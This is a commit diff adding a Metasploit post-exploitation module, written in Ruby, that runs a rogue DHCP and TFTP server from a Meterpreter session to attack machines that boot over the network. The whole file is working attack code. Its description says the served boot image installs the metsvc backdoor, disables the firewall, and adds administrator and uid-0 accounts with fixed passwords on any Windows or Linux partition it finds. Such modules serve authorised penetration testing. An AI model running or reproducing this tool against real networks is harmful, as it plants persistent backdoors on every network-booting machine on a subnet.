|
| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'msf/core/auxiliary/report' |
| 8 | + |
| 9 | +class Metasploit3 < Msf::Post |
| 10 | + |
| 11 | + include Msf::Auxiliary::Report |
| 12 | + |
| 13 | + def initialize |
| 14 | + super( |
| 15 | + 'Name' => 'Windows Manage PXE Exploit Server', |
| 16 | + 'Description' => %q{ |
| 17 | + This module provides a PXE server, running a DHCP and TFTP server. |
| 18 | + The default configuration loads a linux kernel and initrd into memory that |
| 19 | + reads the hard drive; placing a payload to install metsvc, disable the |
| 20 | + firewall, and add a new user metasploit on any Windows partition seen, |
| 21 | + and add a uid 0 user with username and password metasploit to any linux |
| 22 | + partition seen. The windows user will have the password p@SSw0rd!123456 |
| 23 | + (in case of complexity requirements) and will be added to the administrators |
| 24 | + group. |
| 25 | +
|
| 26 | + See exploit/windows/misc/pxesploit for a version to deliver a specific payload. |
| 27 | +
|
| 28 | + Note: the displayed IP address of a target is the address this DHCP server |
| 29 | + handed out, not the "normal" IP address the host uses. |
| 30 | + }, |
| 31 | + 'Author' => [ 'scriptjunkie' ], |
| 32 | + 'License' => MSF_LICENSE, |
| 33 | + 'Platform' => [ 'win' ], |
| 34 | + 'SessionTypes' => [ 'meterpreter' ] |
| 35 | + ) |
| 36 | + |
| 37 | + register_advanced_options( |
| 38 | + [ |
| 39 | + OptString.new('TFTPROOT', [ false, 'The TFTP root directory to serve files from', |
| 40 | + File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')]), |
| 41 | + OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]), |
| 42 | + OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]), |
| 43 | + OptBool.new('RESETPXE', [ true, 'Resets the server to re-exploit already targeted hosts', false ]), |
| 44 | + OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]), |
| 45 | + OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ]) |
| 46 | + ], self.class) |
| 47 | + end |
| 48 | + |
| 49 | + def run |
| 50 | + if not client.lanattacks |
| 51 | + print_status("Loading lanattacks extension...") |
| 52 | + client.core.use("lanattacks") |
| 53 | + else |
| 54 | + if datastore['RESETPXE'] |
| 55 | + print_status("Resetting PXE attack...") |
| 56 | + client.lanattacks.dhcp.reset |
| 57 | + end |
| 58 | + end |
| 59 | + |
| 60 | + #Not setting these options (using autodetect) |
| 61 | + print_status("Loading DHCP options...") |
| 62 | + client.lanattacks.dhcp.load_options(datastore) |
| 63 | + |
| 64 | + 0.upto(4) do |i| |
| 65 | + print_status("Loading file #{i+1} of 5") |
| 66 | + contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}")) |
| 67 | + client.lanattacks.tftp.add_file("update#{i}",contents) |
| 68 | + end |
| 69 | + print_status("Starting TFTP server...") |
| 70 | + client.lanattacks.tftp.start |
| 71 | + print_status("Starting DHCP server...") |
| 72 | + client.lanattacks.dhcp.start |
| 73 | + print_status("PXEsploit attack started") |
| 74 | + while (true) do |
| 75 | + begin |
| 76 | + # get stats every 20s |
| 77 | + select(nil, nil, nil, 20) |
| 78 | + client.lanattacks.dhcp.log.each do |item| |
| 79 | + print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} "+ |
| 80 | + "(#{Rex::Socket.addr_ntoa(item[1])})") |
| 81 | + report_note({ |
| 82 | + :type => 'PXE.client', |
| 83 | + :data => item[0].unpack('H2H2H2H2H2H2').join(':') |
| 84 | + }) |
| 85 | + end |
| 86 | + rescue ::Interrupt |
| 87 | + print_status("Stopping TFTP server...") |
| 88 | + client.lanattacks.tftp.stop |
| 89 | + print_status("Stopping DHCP server...") |
| 90 | + client.lanattacks.dhcp.stop |
| 91 | + print_status("PXEsploit attack stopped") |
| 92 | + return |
| 93 | + end |
| 94 | + end |
| 95 | + end |
| 96 | + |
| 97 | +end |
0 commit comments